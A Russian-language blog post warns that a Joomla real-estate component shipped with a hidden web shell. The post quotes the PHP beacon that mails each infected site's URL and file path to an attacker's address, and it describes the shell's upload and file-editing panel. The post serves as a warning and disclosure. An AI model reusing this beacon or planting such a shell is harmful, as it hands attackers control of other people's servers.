Недавно пришлось задуматься о создании сайта для агенства недвижимости. Изучив extensions.joomla.org, я остановился на двух компонентах com_properties или com_fw_real_estate_light…
Статью изначально писал на Хабр. Да не случилось.

$site = "www.Sh3ll.Us"; if(!ereg($site, $_SERVER['SERVER_NAME'])) { $to = "sshadyarchi@gmail.com"; $subject = "EGFM"; $header = "from: EGFM "; $message = "Link : http://" . $_SERVER['SERVER_NAME'] . $_SERVER ['REQUEST_URI'] . "\r\n"; $message .= "Path : " . __file__; $sentmail = @mail($to, $subject, $message, $header); echo ""; exit;
Colored with dumpz.org
Естественно с адресом разработчика этот адрес не совпадал. Очень быстро после такого открытия я отыскал указанный avast’ом файл /site/controllers/panel.php. Но что это, никаких привычных defined( '_JEXEC' ) or die( 'Restricted access' );
я не обнаружил. Вместо этого файл начинался строкой «//Change User & Password». Ниже шла авторизация. Не задумываясь особо, я набрал соответствующий прямой адрес на моем «хостинге» и попал на такую вот страничку: Форму авторизации я убрал, после чего во всей «красе» передо мной предстала панель взломщика. Отсюда можно было закачивать файлы, править php.ini, выполнять fopen удаленных файлов и прочие «прелести». Автор всей это мерзопакости не постеснялся подписаться: EgY_SpIdEr | | egy_spider@hotmail.com |developer by EgY SpIdEr На последок я проверил папку /tmp/!sendmail моего Денвера и конечно же обнаружил письма с указанием адреса хоста, с которого был запущен вражий скрипт. Конечно же ничего плохого не произошло, т.к. сайт тестировался на локалхосте. Товарищи, остерегайтесь и будьте бдительны, ведь пострадали уже многие -> http://www.google.com.ua/search?ie=UTF-8&hl=ru&q=EgY_SpIdEr%20ShElL
PS: 14.02.2011 компонент был обновлен до версии 3_1_0624. Avast больше не ругается, сомнительный файл panel.php теперь похудел до размера 1кб и вредного кода в себе не содержит.
Тем не менее, если взломанный компонент был выложен на сайте разработчика, стоит ли доверять?

